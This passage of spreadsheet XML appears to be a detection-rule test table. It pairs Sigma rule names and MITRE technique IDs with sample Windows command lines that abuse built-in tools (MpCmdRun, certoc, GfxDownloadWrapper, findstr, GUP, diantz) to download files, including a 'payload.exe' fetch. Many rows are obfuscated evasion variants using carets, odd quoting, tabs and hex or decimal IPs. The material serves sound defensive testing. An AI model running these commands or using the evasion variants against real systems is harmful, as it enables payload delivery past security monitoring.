      <c r="G736" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H736" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I736" s="41" t="n"/>
      <c r="J736" s="41" t="n"/>
      <c r="K736" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1" s="42">
      <c r="A737" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B737" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_remote_shell_</t>
        </is>
      </c>
      <c r="C737" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Shell Execution</t>
        </is>
      </c>
      <c r="D737" s="41" t="inlineStr">
        <is>
          <t>f4a623c2-4ef5-4c33-b811-0642f702c9f1</t>
        </is>
      </c>
      <c r="E737" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -File .\shellIntegration.ps1</t>
        </is>
      </c>
      <c r="F737" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G737" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H737" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I737" s="41" t="n"/>
      <c r="J737" s="41" t="n"/>
      <c r="K737" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1" s="42">
      <c r="A738" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B738" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C738" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D738" s="41" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E738" s="41" t="inlineStr">
        <is>
          <t>findstr.exe /v /l "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F738" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G738" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H738" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I738" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa); Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J738" s="41" t="n"/>
      <c r="K738" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1" s="42">
      <c r="A739" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B739" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C739" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D739" s="41" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E739" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr.exe /v^  /l^  "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F739" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G739" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H739" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I739" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J739" s="41" t="n"/>
      <c r="K739" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1" s="42">
      <c r="A740" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B740" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C740" s="41" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D740" s="41" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E740" s="41" t="inlineStr">
        <is>
          <t>ldifde.exe /i /f C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F740" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G740" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H740" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I740" s="41" t="n"/>
      <c r="J740" s="41" t="n"/>
      <c r="K740" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1" s="42">
      <c r="A741" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B741" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C741" s="41" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D741" s="41" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E741" s="41" t="inlineStr">
        <is>
          <t>ldifde.exe -f C:\Temp\import.ldif -i</t>
        </is>
      </c>
      <c r="F741" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G741" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H741" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I741" s="41" t="n"/>
      <c r="J741" s="41" t="n"/>
      <c r="K741" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1" s="42">
      <c r="A742" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B742" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C742" s="41" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D742" s="41" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E742" s="41" t="inlineStr">
        <is>
          <t>ldifde.exe "-i" "-f" C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F742" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G742" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H742" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I742" s="41" t="n"/>
      <c r="J742" s="41" t="n"/>
      <c r="K742" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1" s="42">
      <c r="A743" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B743" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C743" s="41" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D743" s="41" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E743" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c ldifde.exe -^i -^f C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F743" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G743" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H743" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I743" s="41" t="n"/>
      <c r="J743" s="41" t="n"/>
      <c r="K743" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1" s="42">
      <c r="A744" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B744" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C744" s="41" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D744" s="41" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E744" s="41" t="inlineStr">
        <is>
          <t>ldifde.exe -i  -f  C:\Temp\import.ldif</t>
        </is>
      </c>
      <c r="F744" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G744" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H744" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I744" s="41" t="n"/>
      <c r="J744" s="41" t="n"/>
      <c r="K744" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1" s="42">
      <c r="A745" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B745" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C745" s="41" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D745" s="41" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E745" s="41" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -Downloadfile -Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F745" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G745" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H745" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I745" s="41" t="n"/>
      <c r="J745" s="41" t="n"/>
      <c r="K745" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1" s="42">
      <c r="A746" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B746" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C746" s="41" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D746" s="41" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E746" s="41" t="inlineStr">
        <is>
          <t>MpCmdRun.exe "-DownloadFile" "-url" https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F746" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G746" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H746" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I746" s="41" t="n"/>
      <c r="J746" s="41" t="n"/>
      <c r="K746" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1" s="42">
      <c r="A747" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B747" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download</t>
        </is>
      </c>
      <c r="C747" s="41" t="inlineStr">
        <is>
          <t>File Download via CertOC.EXE</t>
        </is>
      </c>
      <c r="D747" s="41" t="inlineStr">
        <is>
          <t>70ad0861-d1fe-491c-a45f-fa48148a300d</t>
        </is>
      </c>
      <c r="E747" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" /GetCACAPS http://192.0.2.10/certsrv/</t>
        </is>
      </c>
      <c r="F747" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G747" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H747" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I747" s="41" t="n"/>
      <c r="J747" s="41" t="n"/>
      <c r="K747" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1" s="42">
      <c r="A748" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B748" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download</t>
        </is>
      </c>
      <c r="C748" s="41" t="inlineStr">
        <is>
          <t>File Download via CertOC.EXE</t>
        </is>
      </c>
      <c r="D748" s="41" t="inlineStr">
        <is>
          <t>70ad0861-d1fe-491c-a45f-fa48148a300d</t>
        </is>
      </c>
      <c r="E748" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" "-GetCACAPS" http://192.0.2.10/certsrv/</t>
        </is>
      </c>
      <c r="F748" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G748" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H748" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I748" s="41" t="n"/>
      <c r="J748" s="41" t="n"/>
      <c r="K748" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1" s="42">
      <c r="A749" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B749" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download</t>
        </is>
      </c>
      <c r="C749" s="41" t="inlineStr">
        <is>
          <t>File Download via CertOC.EXE</t>
        </is>
      </c>
      <c r="D749" s="41" t="inlineStr">
        <is>
          <t>70ad0861-d1fe-491c-a45f-fa48148a300d</t>
        </is>
      </c>
      <c r="E749" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Windows\SysWOW64\certoc.exe" -GetCA^CAPS http://192.0.2.10/certsrv/"</t>
        </is>
      </c>
      <c r="F749" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G749" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H749" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I749" s="41" t="n"/>
      <c r="J749" s="41" t="n"/>
      <c r="K749" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1" s="42">
      <c r="A750" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B750" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download</t>
        </is>
      </c>
      <c r="C750" s="41" t="inlineStr">
        <is>
          <t>File Download via CertOC.EXE</t>
        </is>
      </c>
      <c r="D750" s="41" t="inlineStr">
        <is>
          <t>70ad0861-d1fe-491c-a45f-fa48148a300d</t>
        </is>
      </c>
      <c r="E750" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\SysWOW64\certoc.exe" -GetCACAPS h"tt"p://192.0.2.10/certsrv/</t>
        </is>
      </c>
      <c r="F750" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G750" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H750" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I750" s="41" t="n"/>
      <c r="J750" s="41" t="n"/>
      <c r="K750" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1" s="42">
      <c r="A751" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B751" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C751" s="41" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D751" s="41" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E751" s="41" t="inlineStr">
        <is>
          <t>CERTOC.EXE /GetCACAPS http://203.0.113.50/CertSrv/</t>
        </is>
      </c>
      <c r="F751" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G751" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H751" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I751" s="41" t="n"/>
      <c r="J751" s="41" t="n"/>
      <c r="K751" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1" s="42">
      <c r="A752" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B752" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C752" s="41" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D752" s="41" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E752" s="41" t="inlineStr">
        <is>
          <t>CERTOC.EXE "-GetCACAPS" http://203.0.113.50/CertSrv/</t>
        </is>
      </c>
      <c r="F752" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G752" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H752" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I752" s="41" t="n"/>
      <c r="J752" s="41" t="n"/>
      <c r="K752" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1" s="42">
      <c r="A753" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B753" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C753" s="41" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D753" s="41" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E753" s="41" t="inlineStr">
        <is>
          <t>CERTOC.EXE -GetCACAPS http://0xCB.0x00.0x71.0x32/CertSrv/</t>
        </is>
      </c>
      <c r="F753" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G753" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H753" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I753" s="41" t="n"/>
      <c r="J753" s="41" t="n"/>
      <c r="K753" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1" s="42">
      <c r="A754" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B754" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C754" s="41" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D754" s="41" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E754" s="41" t="inlineStr">
        <is>
          <t>CERTOC.EXE -GetCACAPS http://3405746482/CertSrv/</t>
        </is>
      </c>
      <c r="F754" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G754" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H754" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I754" s="41" t="n"/>
      <c r="J754" s="41" t="n"/>
      <c r="K754" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1" s="42">
      <c r="A755" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B755" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_gfxdownloadwrapper_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C755" s="41" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via GfxDownloadWrapper.EXE</t>
        </is>
      </c>
      <c r="D755" s="41" t="inlineStr">
        <is>
          <t>eee00933-a761-4cd0-be70-c42fe91731e7</t>
        </is>
      </c>
      <c r="E755" s="41" t="inlineStr">
        <is>
          <t>GfxDownloadWrapper.exe "https://example.com/payload.exe" "C:\Temp\target.exe"</t>
        </is>
      </c>
      <c r="F755" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G755" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H755" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I755" s="41" t="n"/>
      <c r="J755" s="41" t="n"/>
      <c r="K755" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1" s="42">
      <c r="A756" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B756" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_gfxdownloadwrapper_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C756" s="41" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via GfxDownloadWrapper.EXE</t>
        </is>
      </c>
      <c r="D756" s="41" t="inlineStr">
        <is>
          <t>eee00933-a761-4cd0-be70-c42fe91731e7</t>
        </is>
      </c>
      <c r="E756" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c GfxDownloadWrapper.exe htt^ps://example.com/payload.exe C:\Temp\target.exe</t>
        </is>
      </c>
      <c r="F756" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G756" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H756" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I756" s="41" t="n"/>
      <c r="J756" s="41" t="n"/>
      <c r="K756" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1" s="42">
      <c r="A757" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B757" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C757" s="41" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D757" s="41" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E757" s="41" t="inlineStr">
        <is>
          <t>GUP.exe /unzipTo "" "C:\Temp" "Sample https://getsamplefiles.com/download/zip/sample-2.zip CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F757" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G757" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H757" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I757" s="41" t="n"/>
      <c r="J757" s="41" t="n"/>
      <c r="K757" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1" s="42">
      <c r="A758" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B758" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C758" s="41" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D758" s="41" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E758" s="41" t="inlineStr">
        <is>
          <t>GUP.exe "-unzipTo" "" "C:\Temp" "Sample https://getsamplefiles.com/download/zip/sample-2.zip CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F758" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G758" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H758" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I758" s="41" t="n"/>
      <c r="J758" s="41" t="n"/>
      <c r="K758" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1" s="42">
      <c r="A759" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B759" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C759" s="41" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D759" s="41" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E759" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c GUP.exe -unzipTo^  "" "C:\Temp" "Sample https://getsamplefiles.com/download/zip/sample-2.zip CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F759" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G759" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H759" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I759" s="41" t="n"/>
      <c r="J759" s="41" t="n"/>
      <c r="K759" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1" s="42">
      <c r="A760" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B760" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C760" s="41" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D760" s="41" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E760" s="41" t="inlineStr">
        <is>
          <t>GUP.exe	-unzipTo	""	"C:\Temp"	"Sample https://getsamplefiles.com/download/zip/sample-2.zip CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F760" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G760" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H760" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I760" s="41" t="n"/>
      <c r="J760" s="41" t="n"/>
      <c r="K760" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1" s="42">
      <c r="A761" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B761" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C761" s="41" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D761" s="41" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E761" s="41" t="inlineStr">
        <is>
          <t>diantz.exe	\\UNC\share\file.txt C:\Temp\output.cab</t>
        </is>
      </c>
      <c r="F761" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G761" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H761" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I761" s="41" t="n"/>
      <c r="J761" s="41" t="n"/>
      <c r="K761" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1" s="42">
      <c r="A762" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B762" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C762" s="41" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D762" s="41" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E762" s="41" t="inlineStr">
        <is>
          <t>diantz.exe "\\UNC\share\file.txt" C:\Temp\output.cab</t>
        </is>
      </c>
      <c r="F762" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G762" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H762" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I762" s="41" t="n"/>
      <c r="J762" s="41" t="n"/>
      <c r="K762" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1" s="42">
      <c r="A763" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B763" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C763" s="41" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D763" s="41" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E763" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c dian^tz.exe \\UNC\share\file.txt C:\Temp\output.cab</t>
        </is>
      </c>
      <c r="F763" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G763" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H763" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I763" s="41" t="n"/>
      <c r="J763" s="41" t="n"/>
      <c r="K763" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1" s="42">
      <c r="A764" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B764" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C764" s="41" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D764" s="41" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E764" s="41" t="inlineStr">
        <is>
          <t>diantz.exe  \\UNC\share\file.txt  C:\Temp\output.cab</t>
        </is>
      </c>
      <c r="F764" s="41" t="b">
        <v>0</v>
      </c>
